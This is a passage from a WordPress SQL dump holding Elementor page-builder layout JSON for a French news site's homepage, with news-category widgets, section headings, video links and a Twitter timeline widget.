ion_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":35},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"140\",\"category_bg_color\":\"#e2db00\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":10,\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"17\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"offset\":\"0\",\"title_font_size\":{\"unit\":\"px\",\"size\":16},\"use_date\":\"\",\"use_read\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"48mal4x\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.960\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"x20xpc5\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"5\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#ff6600\",\"category_bg_hover_color\":\"#ea7441\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"y4m8rgg\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"4\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#0099f4\",\"category_bg_hover_color\":\"#e5e100\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_color1\":\"rgba(255,255,255,0.5)\",\"post_icon_color2\":\"rgba(255,255,255,0.5)\",\"post_icon_size\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding\":{\"unit\":\"px\",\"size\":\"15\"},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"offset\":\"1\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"c10cdqk\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"cnfm4uk\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ofz40wf\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":17}},\"elements\":[],\"widgetType\":\"spacer\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ghxiaw4\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\"},\"elements\":[{\"id\":\"p0xcklh\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"tdxggq6\",\"elType\":\"widget\",\"settings\":{\"title\":\"R\\u00e9cent\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"lf137zu\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category_border_color\":\"#31c6b0\",\"title_font_size\":{\"unit\":\"px\",\"size\":12},\"use_excerpt\":\"\",\"button_bg_color\":\"#31c6b0\",\"animetime\":0},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"h33oed1\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"z1s2m91\",\"elType\":\"widget\",\"settings\":{\"title\":\"Videos \",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"tb167uj\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=0jeXbexRihs\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"4pok7wn\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=c_ixEg9Gszk&feature=youtu.be\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"},{\"id\":\"m45qqz3\",\"elType\":\"widget\",\"settings\":{\"link\":\"https:\\/\\/www.youtube.com\\/watch?v=wQaejvxoQ2o\",\"vimeo_link\":\"https:\\/\\/vimeo.com\\/235215203\"},\"elements\":[],\"widgetType\":\"video\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"dzzumio\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"q3q9ybg\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"tbcuyne\",\"elType\":\"widget\",\"settings\":{\"title\":\"Technologie\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8sxkg8r\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\"},\"elements\":[{\"id\":\"yxax9tw\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":60.524},\"elements\":[{\"id\":\"cetl99v\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"6\",\"category\":[\"3\"],\"title_font_size\":{\"unit\":\"px\",\"size\":12},\"use_date\":\"\",\"use_excerpt\":\"\",\"animate\":\"\",\"animetime\":0,\"category_border_color\":\"#4a00b4\",\"button_bg_color\":\"#4a00b4\"},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false},{\"id\":\"583gbbd\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":39.475},\"elements\":[{\"id\":\"ed1i4kp\",\"elType\":\"widget\",\"settings\":{\"wp\":{\"title\":\"Suivez nous sur Twitter\",\"twitter_timeline_type\":\"username\",\"twitter_widget_username\":\"Gn_innovations\",\"twitter_widget_id\":\"\",\"twitter_widget_width\":\"\",\"twitter_widget_height\":\"400\",\"twitter_widget_tweet_limit\":\"4\",\"twitter_widget_theme\":\"light\",\"twitter_widget_link_color\":\"#3b94d9\",\"twitter_widget_border_color\":\"#f5f5f5\"}},\"elements\":[],\"widgetType\":\"wp-widget-do-etfw\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"0h88cw7\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"0d8cxde\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"gw32h4p\",\"elType\":\"widget\",\"settings\":{\"title\":\"Agriculture\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8hg86ic\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"i9kn0sp\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"fxvmt3h\",\"elType\":\"widget\",\"settings\":{\"posts_per_page\":\"4\",\"category\":[\"2\"],\"excerpt_value\":10,\"category_border_color\":\"#23a455\",\"title_font_size\":{\"unit\":\"px\",\"size\":12},\"use_excerpt\":\"\"},\"elements\":[],\"widgetType\":\"magzma-masonry-post-1\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"bguffns\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"15hcw7d\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"ptqj2h6\",\"elType\":\"widget\",\"settings\":{\"title\":\"Autres\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_line_height\":{\"unit\":\"em\",\"size\":2},\"_border_border\":\"double\",\"_border_width\":{\"unit\":\"px\",\"top\":\"2\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"ub0yntr\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"tkvnvir\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(2823,851,'_elementor_version','0.4'),(2824,851,'_elementor_css','a:3:{s:4:\"time\";i:1509549637;s:5:\"fonts\";a:1:{i:0;s:5:\"Arial\";}s:6:\"status\";s:4:\"file\";}'),(2826,852,'_elementor_edit_mode','builder'),(2827,852,'_elementor_data','[{\"id\":\"cgfdli8\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"content_width\":{\"unit\":\"px\",\"size\":1170},\"gap\":\"no\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"90zub0t\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"9wd6jr7\",\"elType\":\"section\",\"settings\":{\"section_layout\":\"\",\"layout\":\"full_width\",\"gap\":\"no\",\"structure\":\"30\",\"section_sticky_element\":\"\",\"section_background\":\"\",\"background_overlay_section\":\"\",\"section_border\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_typo\":\"\",\"section_advanced\":\"\",\"_section_responsive\":\"\",\"heading_visibility\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\"},\"elements\":[{\"id\":\"so55224\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"27.961\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"gvq9sbs\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"2\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"45\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":41},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":2},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#4caf50\",\"category_bg_hover_color\":\"#4caf50\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":18},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":19},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":16},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom\":\"-10\",\"margin_bottom_tablet\":0,\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":24},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"offset\":\"1\",\"use_category\":\"\",\"use_icon\":\"\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"dghaq27\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"offset\":\"0\",\"category\":[\"17\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":\"56\"},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"300\",\"height\":\"250\",\"category_bg_color\":\"#fd0249\",\"category_bg_hover_color\":\"#266cc9\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":19},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":\"0\",\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"title_font_size\":{\"unit\":\"px\",\"size\":20}},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"}],\"isInner\":true},{\"id\":\"6uc2i0p\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":\"44.078\",\"section_style\":\"\",\"box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"section_background_overlay\":\"\",\"section_typo\":\"\",\"section_advanced\":\"\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"section_responsive\":\"\",\"screen_xs\":\"default\",\"screen_xs_width\":\"100\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"layout\":\"\"},\"elements\":[{\"id\":\"fb4g874\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"3\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":52},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"350\",\"category_bg_color\":\"#4a00b4\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":22},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":22},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":10,\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\":\"\",\"_section_background\":\"\",\"_box_shadow_box_shadow\":{\"horizontal\":0,\"vertical\":0,\"blur\":10,\"spread\":0,\"inset\":\"\",\"color\":\"rgba(0,0,0,0.5)\"},\"_section_responsive\":\"\",\"responsive_description\":\"\",\"section_custom_css_pro\":\"\",\"custom_css_pro\":\"\",\"_margin_mobile\":{\"unit\":\"px\",\"top\":\"17\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"offset\":\"2\"},\"elements\":[],\"widgetType\":\"magzma-main-news-1\"},{\"id\":\"3k7dn06\",\"elType\":\"widget\",\"settings\":{\"section_magzma_main_news_1_general_control\":\"\",\"posts_per_page\":\"1\",\"category\":[\"6\"],\"section_magzma_main_news_post_control\":\"\",\"vertical_position\":{\"unit\":\"%\",\"size\":35},\"vertical_position_tablet\":{\"unit\":\"%\",\"size\":50},\"vertical_position_mobile\":{\"unit\":\"%\",\"size\":50},\"horizontal_position_tablet\":{\"unit\":\"%\",\"size\":5},\"horizontal_position_mobile\":{\"unit\":\"%\",\"size\":5},\"width\":\"400\",\"height\":\"140\",\"category_bg_color\":\"#e2db00\",\"category_bg_hover_color\":\"#c9975f\",\"typhography_title_color\":\"#ffffff\",\"typhography_title_hover_color\":\"#dddddd\",\"title_line_height_tablet\":{\"unit\":\"em\",\"size\":1.3},\"title_line_height_mobile\":{\"unit\":\"em\",\"size\":1.3},\"title_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"title_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"title_font_weight_tablet\":\"400\",\"title_font_weight_mobile\":\"400\",\"date_font_size_tablet\":{\"unit\":\"px\",\"size\":14},\"date_font_size_mobile\":{\"unit\":\"px\",\"size\":14},\"date_font_weight_tablet\":\"400\",\"date_font_weight_mobile\":\"400\",\"read_font_size_tablet\":{\"unit\":\"px\",\"size\":16},\"read_font_size_mobile\":{\"unit\":\"px\",\"size\":16},\"read_font_weight_tablet\":\"400\",\"read_font_weight_mobile\":\"400\",\"post_icon_size_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_size_mobile\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_tablet\":{\"unit\":\"px\",\"size\":20},\"post_icon_padding_mobile\":{\"unit\":\"px\",\"size\":20},\"section_magzma_main_news_column_control\":\"\",\"margin_bottom_tablet\":\"0\",\"margin_bottom_mobile\":10,\"horizontal_col_select_tablet\":\"column-1\",\"horizontal_col_select_mobile\":\"column-1\",\"padding_size_tablet\":{\"unit\":\"px\",\"size\":25},\"padding_size_mobile\":{\"unit\":\"px\",\"size\":25},\"section_magzma_main_news_animation_control\":\"\",\"_section_style\